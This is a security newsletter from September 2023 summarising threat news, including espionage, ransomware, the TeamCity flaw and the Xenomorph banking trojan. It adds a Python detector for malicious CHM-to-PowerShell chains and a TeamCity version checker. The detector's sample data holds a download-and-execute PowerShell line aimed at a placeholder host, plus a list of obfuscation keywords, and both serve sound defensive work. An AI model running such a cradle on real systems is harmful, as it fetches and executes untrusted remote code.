Daily Drop (607): EvilBamboo, Myanmar's Growing Cyber Scam, US-China Cybersecurity, Ukrainian Military Faces Phishing, Rhysida Ransomware, JetBrains TeamCity, AlphV/Black Cat, Xenomorph
09-26-23
Tuesday, Sep 26, 2023 // (IG): BB // Financial Enabler PODCAST // Coffee for Bob
EvilBamboo's Cyber Espionage: Targeting Tibetans, Uyghurs, and Taiwanese
Bottom Line Up Front (BLUF): EvilBamboo, a cyber espionage group previously known as Evil Eye, has been actively targeting Tibetan, Uyghur, and Taiwanese individuals and organizations since 2019. Using a mix of fake websites, trojanized apps, and social media impersonation, the group aims to gather sensitive information from these communities.
Analyst Comments: The persistence of EvilBamboo's operations since 2019 shows how durable a targeted espionage campaign can be. Building and maintaining fake communities, then pushing trojanized apps through them, takes sustained effort and resources. Members of the targeted communities, and organizations supporting them, should be deliberate about where they obtain apps and whom they trust on messaging platforms, since the lure here is the community itself rather than a generic phishing email. That the campaign keeps working also points to a gap in current defenses against sideloaded and impersonated apps.
FROM THE MEDIA: EvilBamboo has orchestrated a comprehensive campaign, creating fake Tibetan websites and social media profiles to deploy browser-based exploits. The group has also impersonated popular communities, building a presence on platforms such as Telegram to distribute its malware. Historically, it has exploited vulnerabilities in Apple's WebKit browser engine to deliver iOS spyware such as Insomnia. The group has been associated with several Android malware families, notably ActionSpy, PluginPhantom, BADBAZAAR, BADSIGNAL, and BADSOLAR. Its distribution methods are diverse, ranging from APK sharing forums to fake profiles on major social media platforms.
READ THE STORY: THN
Myanmar's Growing Cyber Scam Crisis: UNODC Report Highlights
Bottom Line Up Front (BLUF): Organized crime groups, primarily from China and Taiwan, have established fortified bases in Myanmar's border areas, particularly near China, to conduct extensive online scams. These regions are challenging for law enforcement to access, and the trafficked victims used for scams find it nearly impossible to escape.
Analyst Comments: The establishment of these scam bases in remote areas of Myanmar underscores the adaptability and resourcefulness of organized crime groups. Their ability to exploit regions with limited governmental control, combined with the use of trafficked labor, indicates a high level of sophistication and poses a significant challenge for regional law enforcement. The involvement of ethnic militias further complicates the situation, intertwining criminal activities with regional political and ethnic conflicts. The scams' evolution, initially emerging in Cambodian casinos and then transitioning to online operations during the pandemic, suggests that these groups are quick to capitalize on changing circumstances and vulnerabilities. International cooperation and a comprehensive approach will be crucial to address this multifaceted challenge.
FROM THE MEDIA: The United Nations Office on Drugs and Crime (UNODC) report reveals that these crime gangs, responsible for Asia's "scamdemic," have scammed billions through online romance scams, extortion, and investment pyramid schemes. While some crackdowns occurred in Cambodia and the Philippines, these groups have fortified their operations in Myanmar, especially around the Myawaddy region and along the eastern frontier with China. These areas are controlled by ethnic militias with a history of trafficking and are far from the reach of Myanmar's military government. The UNODC report highlights that Myanmar is home to non-state armed groups that control significant border areas and have a history of collaborating with organized crime syndicates. These groups operate numerous casinos in autonomous regions and border towns. The scam hubs have attracted tens of thousands from Asia and beyond, many of whom believed they were recruited for legitimate high-paying tech jobs. Once inside these fortified compounds, many victims realize the scam and must pay ransoms to leave. Some are aware of the scam nature of the job before arriving, recruiting others for a fee. The Myanmar government has not commented, but regional cooperation is underway to address the scam crisis.
READ THE STORY: VOA
US-China Cybersecurity Summit: Bridging Digital Divides
Bottom Line Up Front (BLUF): On September 22, 2023, high-ranking defense officials from the US and China convened at the Pentagon for a landmark cybersecurity summit. This meeting aimed to introduce the Chinese delegation to the US Department of Defense's 2023 Cyber Strategy Summary and to foster mutual understanding and cooperation in the digital realm.
Analyst Comments: The significance of this summit is immense, given the pivotal role of cyberspace in global stability and national security. Direct dialogue between major powers like the US and China is crucial to address the tangible risks in the digital realm, such as miscommunication and unintentional escalation. This meeting represents a step towards building a foundation of trust in cyberspace. While challenges remain, such engagements offer hope for a more collaborative future in the digital domain. The international community should recognize the importance of such diplomatic efforts, emphasizing the role of cooperation in managing the complexities of the digital age. As the cyber landscape continues to evolve, the insights from this summit underscore the enduring importance of diplomacy in ensuring a peaceful and stable digital environment.
FROM THE MEDIA: The summit, a blend of in-person and virtual attendance, highlighted the lasting effects of the COVID-19 pandemic on international diplomacy. The backdrop for this event was the US-PRC Memorandum of Understanding on Notification of Major Military Activities Confidence Building Measure Mechanism, signed in 2014. This agreement seeks to prevent misunderstandings and miscommunications between the two military superpowers. The 2023 Cyber Strategy Summary, a comprehensive document, was the focal point of the meeting. This strategy emphasizes the Pentagon's commitment to bolstering its cyber networks against emerging threats. The discussions during the summit were extensive, covering topics from establishing cyber norms to collaborative initiatives and deterrence strategies. Both nations acknowledged the importance of mutual respect and trust in the cyber domain.
READ THE STORY: Eurasia Review
Ukrainian Military Faces Phishing Attacks Using Drone Manuals
Bottom Line Up Front (BLUF): The Ukrainian military is being targeted by a phishing campaign that uses drone manuals as bait to deliver the Merlin post-exploitation toolkit. Given the significant role of drones in the Ukrainian military, attackers are exploiting this interest with malware-infused UAV service manuals.
Analyst Comments: Attacks against military and critical-infrastructure targets continue to lean on well-chosen lures rather than novel exploits. A UAV service manual is exactly the document a Ukrainian unit would expect to receive, which is what makes the CHM delivery effective. Organizations in sensitive sectors should treat CHM and other help-file formats arriving over email or chat as suspect, block or monitor hh.exe spawning script interpreters, and keep detection content current with the tactics reported by CERT-UA and vendors.
FROM THE MEDIA: Cybersecurity researchers from Securonix have identified a phishing campaign targeting Ukrainian military entities. The attackers use drone manuals as lures to deliver an open-source post-exploitation toolkit called Merlin. The campaign, named STARK#VORTEX by Securonix, begins with a Microsoft Compiled HTML Help (CHM) file. When this file is opened, it runs malicious JavaScript that triggers PowerShell code, which then contacts a remote server to fetch an obfuscated binary. This binary, when decoded, reveals the Merlin Agent, allowing attackers to take control of the host system. The researchers noted the complexity of the attack's TTPs (Tactics, Techniques, and Procedures) and obfuscation methods, which are designed to evade detection. This is the first instance where Merlin has been used to target Ukrainian government organizations. A similar attack chain was reported by the Computer Emergency Response Team of Ukraine (CERT-UA) in August 2023, which also used CHM files as decoys. The files and documents used in this campaign are designed to bypass defenses. Receiving a Microsoft help file over the internet might typically be considered unusual, but the attackers have crafted the documents to appear legitimate, potentially catching unsuspecting victims off guard.
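The attack chain above (CHM opened by the Windows HTML Help host, embedded script, PowerShell fetching a second stage) leaves a distinctive parent-child process trail. The following is an added detection example, not code from Securonix or the original article: it walks constructed Sysmon Event ID 1-style process-creation records and flags any script interpreter whose ancestry within a few hops includes hh.exe, raising severity when the command line also carries download or obfuscation indicators. Process IDs, paths, command lines and the placeholder URL are all constructed for illustration.

```python
"""Added detection example: flag process chains in which the Windows HTML Help
host (hh.exe) leads to a script interpreter, the path a weaponised CHM file takes
before PowerShell fetches a second stage.

The events below are constructed in the shape of Sysmon Event ID 1 (process
creation) records; PIDs, paths and command lines are illustrative, not observed."""
from dataclasses import dataclass

CHM_HOSTS = {"hh.exe"}
# Interpreters a CHM's embedded script can spawn, directly or via cmd.exe.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# Command-line fragments associated with hidden, encoded or downloading PowerShell.
SUSPICIOUS_ARGS = ("-enc", "-encodedcommand", "-w hidden", "-windowstyle hidden",
                   "downloadstring", "downloadfile", "invoke-webrequest",
                   "frombase64string", "bypass")
MAX_DEPTH = 3  # parent hops to search for hh.exe (cmd.exe is a common intermediate)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full image path as Sysmon reports it
    cmdline: str


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def find_chm_chains(events):
    """Return one finding per script host whose ancestry (within MAX_DEPTH hops)
    contains hh.exe. Severity is 'high' when the command line also carries
    download/obfuscation indicators, otherwise 'medium'."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        if basename(ev.image) not in SCRIPT_HOSTS:
            continue
        parent = by_pid.get(ev.ppid)
        hops = 0
        while parent is not None and hops < MAX_DEPTH:
            if basename(parent.image) in CHM_HOSTS:
                lowered = ev.cmdline.lower()
                indicators = [a for a in SUSPICIOUS_ARGS if a in lowered]
                findings.append({
                    "pid": ev.pid,
                    "image": basename(ev.image),
                    "chm_parent_pid": parent.pid,
                    "chm_cmdline": parent.cmdline,
                    "indicators": indicators,
                    "severity": "high" if indicators else "medium",
                })
                break
            parent = by_pid.get(parent.ppid)
            hops += 1
    return findings


# Constructed sample: one benign PowerShell launch and two CHM-rooted chains.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\hh.exe",
              r'"C:\Windows\hh.exe" C:\Users\operator\Downloads\UAV_service_manual.chm'),
    # hh.exe -> powershell, hidden window, encoded command ("IEX" in UTF-16LE base64)
    ProcEvent(300, 200, PS, "powershell.exe -w hidden -enc SQBFAFgA"),
    # explorer -> powershell, interactive and benign
    ProcEvent(400, 100, PS, "powershell.exe Get-Process"),
    # hh.exe -> cmd -> powershell downloading a stage from a placeholder host
    ProcEvent(500, 200, r"C:\Windows\System32\cmd.exe", "cmd.exe /c start.cmd"),
    ProcEvent(600, 500, PS, "powershell.exe -ExecutionPolicy Bypass -c "
              "IEX((New-Object Net.WebClient).DownloadString('http://placeholder.invalid/s'))"),
]

if __name__ == "__main__":
    for f in find_chm_chains(SAMPLE_EVENTS):
        print(f"[{f['severity']}] pid {f['pid']} ({f['image']}) descends from hh.exe "
              f"pid {f['chm_parent_pid']}; indicators={f['indicators']}")
```

Run against the sample, the benign explorer-launched PowerShell (pid 400) is not reported, while both CHM-rooted launches are, including the one that passes through cmd.exe. In production the same logic maps onto a SIEM query joining ProcessId to ParentProcessId; tuning MAX_DEPTH and SUSPICIOUS_ARGS to the environment is expected.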
READ THE STORY: THN
Rhysida Ransomware Gang Demands Payment, Government Assures Payroll Systems Unaffected
Bottom Line Up Front (BLUF): Kuwait's Ministry of Finance has been hit by a ransomware attack, with the Rhysida ransomware gang claiming responsibility and demanding a ransom. Despite the attack, the government has assured that payroll systems remain unaffected.
Analyst Comments: The increasing frequency of ransomware attacks on government entities underscores the escalating threat landscape. Governments and organizations must bolster their cybersecurity defenses and remain vigilant against such threats. The commitment to not paying ransoms, as advocated by the U.S. National Security Council, may deter attackers in the long run, but in the short term, entities must prioritize preventive measures and rapid response capabilities.
FROM THE MEDIA: On September 18, the government of Kuwait experienced a ransomware attack targeting its Ministry of Finance. In response, officials immediately took action to isolate and shut down the affected systems. To address concerns, the government emphasized that the payment and payroll systems were on a separate network and remained unaffected by the attack. The country's National Cyber Center has been working diligently to resolve the issue, seeking assistance from cybersecurity firms and other governments. In a statement, the government explained, “Since the first day of the cyberattack, we have been isolating the systems of the Ministry of Finance from the rest of the systems of government agencies... All government agencies are continuing and operating normally.” On the morning of September 26, the Rhysida ransomware gang added the Ministry of Finance to its list of victims and set a seven-day deadline for the payment of an undisclosed ransom amount. This group has previously targeted other governments and was responsible for a significant attack on Prospect Medical Holdings in the U.S.
READ THE STORY: The Record
Unauthenticated Attackers Can Exploit Flaw for Remote Code Execution on Affected CI/CD Software
Bottom Line Up Front (BLUF): A critical vulnerability has been identified in JetBrains TeamCity, a continuous integration and continuous deployment (CI/CD) server. If exploited, the flaw allows unauthenticated attackers to execute code remotely on affected servers, putting source code, build pipelines, secrets and attached build agents at risk.
Analyst Comments: This vulnerability is a reminder that a CI/CD server is a supply-chain chokepoint: whoever controls it can read every secret the pipeline uses and alter what the pipeline produces. Organizations running TeamCity should update to the patched version without delay or, where an upgrade is not immediately possible, apply the security patch plugin JetBrains has provided, and should audit recently created user tokens and build configurations on servers that were exposed to the internet before patching.
FROM THE MEDIA: The vulnerability in JetBrains TeamCity, tracked as CVE-2023-42793 and rated with a CVSS score of 9.8, can be leveraged by attackers without authentication to achieve remote code execution. The flaw was responsibly disclosed on September 6, 2023, and has since been patched in TeamCity version 2023.05.4. Successful exploitation could lead to theft of source code, service secrets and private keys, and control over attached build agents. Attackers could also poison build artifacts and compromise supply-chain integrity by injecting arbitrary code into build pipelines.
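The first practical check for the advisory above is whether a server is still running a release older than 2023.05.4. The following is an added example, not JetBrains code: it parses the version string TeamCity reports (the REST endpoint /app/rest/server returns it as the version attribute of a server element) and decides whether the server predates the fix. The sample XML response is constructed, and the build numbers in it are illustrative; the caveat about the patch plugin is an assumption worth confirming against the affected server.

```python
"""Added example (not JetBrains code): decide whether a TeamCity server's reported
version predates the 2023.05.4 fix for CVE-2023-42793.

The sample /app/rest/server response below is constructed and its build numbers
are illustrative."""
import re
import xml.etree.ElementTree as ET

FIXED_VERSION = (2023, 5, 4)   # first release containing the fix

# major.minor with an optional bugfix component, e.g. "2023.05.3" or "2022.10"
_VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?")


def parse_version(text: str):
    """Extract (major, minor, bugfix) from strings such as
    '2023.05.3 (build 129390)'. A missing bugfix component is treated as 0."""
    m = _VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no TeamCity version found in {text!r}")
    major, minor, fix = m.groups()
    return (int(major), int(minor), int(fix) if fix else 0)


def is_vulnerable(version_text: str) -> bool:
    """True when the reported version sorts before 2023.05.4.

    Assumption: a server that applied JetBrains' security patch plugin instead of
    upgrading may still report its pre-fix version, so a True result here should
    be confirmed by checking for the plugin before raising an incident."""
    return parse_version(version_text) < FIXED_VERSION


def version_from_server_xml(xml_text: str) -> str:
    """Pull the version attribute out of a GET /app/rest/server XML response."""
    root = ET.fromstring(xml_text)
    if root.tag != "server" or "version" not in root.attrib:
        raise ValueError("unexpected /app/rest/server response")
    return root.attrib["version"]


# Constructed response; build numbers are illustrative.
SAMPLE_SERVER_XML = ('<server version="2023.05.3 (build 129390)" versionMajor="2023" '
                     'versionMinor="5" buildNumber="129390"/>')

if __name__ == "__main__":
    reported = version_from_server_xml(SAMPLE_SERVER_XML)
    state = "VULNERABLE (pre-2023.05.4)" if is_vulnerable(reported) else "patched release"
    print(f"TeamCity reports {reported}: {state}")
```

Tuple comparison gives the right ordering across year-based releases (2023.05.x, 2023.11) and the older numeric scheme (10.0.5), all of which predate the fix. Where the REST endpoint requires credentials, the same version string appears in the footer of the TeamCity web UI.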
READ THE STORY: THN
AlphV/Black Cat Ransomware Gang Claims Responsibility, Potentially Affecting Over 40 Million Customers
Bottom Line Up Front (BLUF): Progressive Leasing, a prominent lease-to-own company, has disclosed a cyberattack that may have compromised sensitive customer data. The AlphV/Black Cat ransomware gang has taken credit for the breach.
Analyst Comments: The cyberattack on Progressive Leasing underscores the growing threat posed by ransomware gangs targeting high-profile companies and accessing vast amounts of sensitive data. Organizations must prioritize cybersecurity measures, including regular backups, employee training, and rapid incident response, to mitigate the risks associated with such attacks.
FROM THE MEDIA: Progressive Leasing, a billion-dollar company offering lease-to-own options for consumer products, recently disclosed a cybersecurity incident affecting some of its systems. While the company has not observed significant operational impacts from the attack, an investigation is ongoing to determine the full extent of the breach. Upon detecting the incident, Progressive Leasing promptly engaged third-party cybersecurity experts and initiated an investigation. The company is collaborating with these experts and law enforcement to address the situation. The investigation aims to identify the specific data involved in the breach. Progressive Leasing, headquartered in Salt Lake City, has partnerships with major retailers such as Best Buy, Samsung, Cricket, Lowe's, Zales, Overstock, Dell, and others. It operates as part of PROG Holdings, a larger corporation offering "buy now, pay later" options. In a recent report to the SEC, PROG Holdings revealed that the compromised data likely contains a significant amount of personally identifiable information, including social security numbers, of Progressive Leasing's customers.
READ THE STORY: The Record
Xenomorph Malware Expands Reach to US Bank Customers
Bottom Line Up Front (BLUF): The Android banking Trojan, Xenomorph, which had been primarily targeting European banks for over a year, has now expanded its operations to target customers of over 30 US banks, posing a significant threat to the financial security of countless individuals.
Analyst Comments: The evolution and expansion of Xenomorph underscore the escalating threat from mobile banking Trojans. Android users are at heightened risk because the platform permits sideloading from outside Google Play, and Xenomorph's current distribution through fake Chrome update and Google Play lookalike pages depends on exactly that. The shift in targeting from European to US banks indicates a strategic move by the operators toward more lucrative targets, and the Automatic Transfer System capability means a compromised device can be drained without further interaction from the victim. Together, its capabilities and its focus on major US financial institutions make Xenomorph a threat that warrants immediate attention from banks' fraud and mobile security teams.
FROM THE MEDIA: The cybercriminals behind Xenomorph, a sophisticated Android banking Trojan, have shifted their focus from European banks to the US. This malware now targets customers of major financial institutions including Chase, Amex, Ally, Citi Mobile, Citizens Bank, Bank of America, and Discover Mobile. Recent samples of the malware have shown additional features that target multiple cryptocurrency wallets, such as Bitcoin, Binance, and Coinbase. Thousands of Android users, especially in the US and Spain, have been affected since August. The malware seems to have a particular interest in Android devices from Samsung and Xiaomi, which together account for about 50% of the Android market share. Previously distributed through malicious apps on Google's Play Store, the latest Xenomorph campaigns use phishing web pages, often masquerading as trusted Chrome browser update sites or Google Play store websites. The malware's capabilities range from intercepting SMS messages and harvesting device information to enabling online account takeovers.
READ THE STORY: DarkReading
Items of interest
Eric Schmidt's Influence: Leveraging Wealth to Shape AI Policy and Global Tech
Bottom Line Up Front (BLUF): Eric Schmidt, the former CEO of Google, is utilizing his vast fortune to influence artificial intelligence (AI) policy and technological advancements in the U.S. and globally. Through various initiatives, investments, and advisory roles, Schmidt has positioned himself as a significant player in the AI landscape, shaping public policy and fostering innovation.
Analyst Comments: Eric Schmidt's involvement in AI policy and development showcases the potential influence of individual billionaires in shaping global tech trajectories. His investments, both personal and through various initiatives, have positioned him as a central figure in the AI discourse. As the U.S. government seeks to establish global standards for AI regulation, Schmidt's influence, combined with his vast network and resources, will likely continue to play a pivotal role in the direction of AI policy and innovation.
FROM THE MEDIA: Eric Schmidt, with a net worth of US$27 billion, has been an influential figure in the tech industry, particularly in the realm of AI. Beyond personal investments such as purchasing a superyacht and owning a stake in a hedge fund, Schmidt has been actively involved in shaping AI policy in Washington. He has consistently advocated for the U.S. to invest both public and private funds in innovative companies to counter China's technological growth. Schmidt founded the Special Competitive Studies Project (SCSP) in 2021, a think tank focusing on the implications of AI and other emerging technologies for the U.S. economy and national security. SCSP has actively advised various congressional committees. Additionally, Schmidt Futures, another of his initiatives, supports scientists and entrepreneurs globally, some of whom have gone on to take roles within governments worldwide. Schmidt's influence is evident in his advisory roles under three consecutive U.S. presidential administrations. He led the congressionally mandated National Security Commission on AI from 2019 to 2021.
READ THE STORY: SMH
Episode 14: Swampy - Ukrainian EOD Vol.(Video)
FROM THE MEDIA: Swampy isn't your typical online personality. Far from the filtered snapshots of beach vacations or the latest fashion trends, his feed offers a window into a world few dare to tread: the perilous landscape of the Russian-Ukrainian conflict. An EOD (Explosive Ordnance Disposal) technician, Swampy's day-to-day involves disarming explosives, a task that requires nerves of steel, unparalleled precision, and an unwavering commitment to the safety of those around him.
Episode 15: Abaddon Knives (Video)
FROM THE MEDIA: Meet Abaddon Knives - not just any EOD technician, but a beacon of resilience, dedication, and expertise in a field that demands unwavering bravery. Dive deep into the life of this incredible individual who effortlessly juggles the roles of a diligent EOD technician, a devoted father, and an insatiable reader.
These open-source products are reviewed by analysts at InfoDom Securities, providing possible context about current media trends related to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in their original material or related links on their sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.